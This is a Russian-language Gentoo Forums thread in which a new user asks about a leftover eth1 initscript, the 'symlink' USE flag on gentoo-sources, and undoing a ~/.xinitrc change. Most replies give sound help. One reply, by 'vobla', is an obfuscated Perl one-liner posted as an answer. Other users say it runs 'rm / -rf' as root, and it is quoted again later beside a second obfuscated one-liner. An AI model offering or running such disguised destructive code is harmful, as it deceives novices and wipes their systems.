Gentoo Forums
Gentoo Forums
Gentoo Forums
Quick Search: in
3 ламошных вопроса.
View unanswered posts
View posts from last 24 hours

 
Reply to topic    Gentoo Forums Forum Index Russian
View previous topic :: View next topic  
Author Message
Megajambo
n00b
n00b


Joined: 11 Aug 2006
Posts: 13
Location: Moscow

PostPosted: Sat Aug 12, 2006 9:29 am    Post subject: 3 ламошных вопроса. Reply with quote

8O
1) В самом начале установки, когда производил настройку сети, определилась сеть на интерфейсе eth1. далее в конце, чтобы сеть стартовала при загрузке делал что-то вроде:
Code Listing 9: Adding net.eth0 to the default runlevel
# rc-update add net.eth0 default

If you have several network interfaces, you need to create the appropriate net.eth1, net.eth2 etc. initscripts for those. You can use ln to do this:
Code Listing 10: Creating extra initscripts
# cd /etc/init.d
# ln -s net.eth0 net.eth1
# rc-update add net.eth1 default
всё заработало. Только теперь при загрузке системы долго стартует dcdhcp и пишет в конце что eth1 не существует. ifconfig показывает что сеть на eth0 и интернет работает... как убрать eth1 ?

2) При установке выполнялось: USE="-doc symlink" emerge gentoo-sources
Сейчас решил делать полное обновление: emerge --update --deep --newuse world
пишет при --preetend что среди прочих изменений будет R (replacing same version) gentoo-sources USE="symlink"
Это что значит? это не повредит моей системе?

3) когда настраивал kde, из под root запустил команду echo "exec startkde" > ~/.xinitrc или как-то так... теперь задумываюсь как отменить это действие, подскажите пожалуйста...
Back to top
View user's profile Send private message
vobla
n00b
n00b


Joined: 25 Mar 2004
Posts: 20

PostPosted: Sat Aug 12, 2006 7:26 pm    Post subject: Reply with quote

Code:
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Back to top
View user's profile Send private message
ladserg
n00b
n00b


Joined: 01 Nov 2004
Posts: 65

PostPosted: Sun Aug 13, 2006 12:43 am    Post subject: Reply with quote

Г-н(жа) Вобла, не могли бы вы перевести свой ответ на русский, или хотя бы русынский, для таких чайников как я?

Megajambo:

1. Сколько у вас сетевых карт? Если одна то удалите симлинк /etc/init.d/eth1, у вас должен быть только /etc/init.d/eth0

2. Это значит, что ссылка /usr/src/linux будет указывать на исходники нового ядра, плохая практика, лучше эту ссылку править руками и обновлять ядро только тогда, когда вам будет удобно. Менять ссылку /usr/src/linux заставляет как раз этот флаг: USE="... symlink ...". Если вы после установки исходников сразу же не скомпилдируете и не обновите ядро, то ряд программ при сборке, такие как nvidia-kernel, использующие эти исходники для сборки, просто не будут у вас работать, т.к. версия текущего ядра - одна, а версия исходников - другая.

3. На самом деле очень просто, вы своим действием в файле ~/.xinitrc указали иксам использовать kde, загляните в этот файл, например коммандой:

Code:
cat ~/.xinitrc


Для отмены этого действия просто удалите добавленную строку, а если она одна, то удалите файл.

Редактирование файла:

Code:
nano ~/.xinitrc


Удаление файла:

Code:
rm ~/.xinitrc
Back to top
View user's profile Send private message
ba
l33t
l33t


Joined: 25 May 2003
Posts: 804

PostPosted: Sun Aug 13, 2006 11:59 am    Post subject: Re: 3 ламошных вопроса. Reply with quote

Megajambo wrote:
8O
1) В самом начале установки, когда производил настройку сети, определилась сеть на интерфейсе eth1. далее в конце, чтобы сеть стартовала при загрузке делал что-то вроде:
Code Listing 9: Adding net.eth0 to the default runlevel
# rc-update add net.eth0 default

If you have several network interfaces, you need to create the appropriate net.eth1, net.eth2 etc. initscripts for those. You can use ln to do this:
Code Listing 10: Creating extra initscripts
# cd /etc/init.d
# ln -s net.eth0 net.eth1
# rc-update add net.eth1 default
всё заработало. Только теперь при загрузке системы долго стартует dcdhcp и пишет в конце что eth1 не существует. ifconfig показывает что сеть на eth0 и интернет работает... как убрать eth1 ?

Code:
rc-update del net.eth1
Back to top
View user's profile Send private message
d_n_k
Tux's lil' helper
Tux's lil' helper


Joined: 15 Jul 2004
Posts: 138
Location: Russia

PostPosted: Mon Aug 14, 2006 11:55 am    Post subject: Reply with quote

ladserg wrote:
Г-н(жа) Вобла, не могли бы вы перевести свой ответ на русский, или хотя бы русынский, для таких чайников как я?

Выполни тот код от root'а и получи rm / -rf
Back to top
View user's profile Send private message
Megajambo
n00b
n00b


Joined: 11 Aug 2006
Posts: 13
Location: Moscow

PostPosted: Mon Aug 14, 2006 12:46 pm    Post subject: Reply with quote

Спасибо всем! 8)
_________________
AMD athlon 64 3700+ San Diego
nVidia GeForce 6600
Back to top
View user's profile Send private message
ladserg
n00b
n00b


Joined: 01 Nov 2004
Posts: 65

PostPosted: Mon Aug 14, 2006 2:21 pm    Post subject: Reply with quote

d_n_k wrote:
ladserg wrote:
Г-н(жа) Вобла, не могли бы вы перевести свой ответ на русский, или хотя бы русынский, для таких чайников как я?

Выполни тот код от root'а и получи rm / -rf


Гм, действительно, тогда у меня другой вопрос, а не потерял ли г-н(жа) Вобла маму, давая такие советы новичкам?
Back to top
View user's profile Send private message
ladserg
n00b
n00b


Joined: 01 Nov 2004
Posts: 65

PostPosted: Mon Aug 14, 2006 4:53 pm    Post subject: Reply with quote

Code:
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'


Прикольно, чуть голову не сломал, пока понял как это работает.

Г-н Vobla, вам будет полезно запустить этот скрипт:

Code:

perl -e 's;;:<).>|{.%|(/</=(/|>!+|\$%,!>*\n{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see';


:)

P.S. Можете не бояться, мой код не вредоносный.
Back to top
View user's profile Send private message
lefsha
Veteran
Veteran


Joined: 30 Aug 2004
Posts: 1014
Location: Sankt-Petersburg, Russia

PostPosted: Wed Aug 23, 2006 10:40 pm    Post subject: Reply with quote

ladserg wrote:

2. Это значит, что ссылка /usr/src/linux будет указывать на исходники нового ядра, плохая практика, лучше эту ссылку править руками и обновлять ядро только тогда,


Обновлять эту ссылку руками и есть плохая практика.
_________________
Lefsha
Back to top
View user's profile Send private message
ladserg
n00b
n00b


Joined: 01 Nov 2004
Posts: 65

PostPosted: Thu Aug 24, 2006 4:14 am    Post subject: Reply with quote

lefsha wrote:

Обновлять эту ссылку руками и есть плохая практика.


Вы предлагаете позволить emerge на серверах обновлять ссылку когда ему вздумается? При учёте, что ядра не всегда обновляются, да и сами сервера годами не перезагружаются, только ПО обновляется и всё.

А если уж изменять ссылку /usr/src/linux, тогда и ядро нужно сразу заново устанавливать, чего опять же мне не нужно.
Back to top
View user's profile Send private message
lefsha
Veteran
Veteran


Joined: 30 Aug 2004
Posts: 1014
Location: Sankt-Petersburg, Russia

PostPosted: Thu Aug 24, 2006 5:09 pm    Post subject: Reply with quote

Нет, я этого не предлагал.

Речь была о том, чтобы делать
Code:
eselect kernel set #

вместо того, чтобы менять ссылку руками.

Кроме того я не особо понимаю как emerge будет обновлять
ссылку когда вздумается... Это просто исключено.
_________________
Lefsha
Back to top
View user's profile Send private message
ladserg
n00b
n00b


Joined: 01 Nov 2004
Posts: 65

PostPosted: Fri Aug 25, 2006 4:09 am    Post subject: Reply with quote

lefsha wrote:

Речь была о том, чтобы делать
Code:
eselect kernel set #


вместо того, чтобы менять ссылку руками.

Ух ты, уже и такое сделали, не знал, ну это тоже подходит.
lefsha wrote:

Кроме того я не особо понимаю как emerge будет обновлять
ссылку когда вздумается... Это просто исключено.

Там флаг есть symlink, я о нём выше писал, с ним при обновлении ядра ссылка будет меняться. Конечно я не имел в виду, что emerge средь ночи подорвётся и пойдёт ни с того ни с сего менять ссылки. Речь шла об обновлении ядра (см. самый первый пост). ИМХО лучше контролировать сей процесс либо придложенным вами способом (что в принципет тоже рукам), либо напрямую редактируя ссылку.
Back to top
View user's profile Send private message
lefsha
Veteran
Veteran


Joined: 30 Aug 2004
Posts: 1014
Location: Sankt-Petersburg, Russia

PostPosted: Fri Aug 25, 2006 4:37 pm    Post subject: Reply with quote

Еще раз! Новое ядро устанавливается в новый слот!
И никакого обновления в этом смысле не происходит.

Так что можно вечно делать emerge - ссылка как была
так и останется той же самой.

Если же захотелось самому поставить новое ядро, то ничто
не мешает перед этим запустить тот код что я показал.

Ядро не может устанавливаться автоматически!
Т.е. такого эффекта добиться можно - но смысла
в нем будет 0. И по умолчанию ничего такого нет.

Т.о. проблема высосана из пальца.
_________________
Lefsha
Back to top
View user's profile Send private message
vobla
n00b
n00b


Joined: 25 Mar 2004
Posts: 20

PostPosted: Sat Aug 26, 2006 6:18 am    Post subject: Reply with quote

2lefsha
Тебе человек пишет про USE флаг symlink, с которым после emerge нового ядра symlink /usr/src/linux автоматически переключается на него. Ни о какой компиляции ядра речи не было.
Back to top
View user's profile Send private message
Display posts from previous:   
Reply to topic    Gentoo Forums Forum Index Russian All times are GMT
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum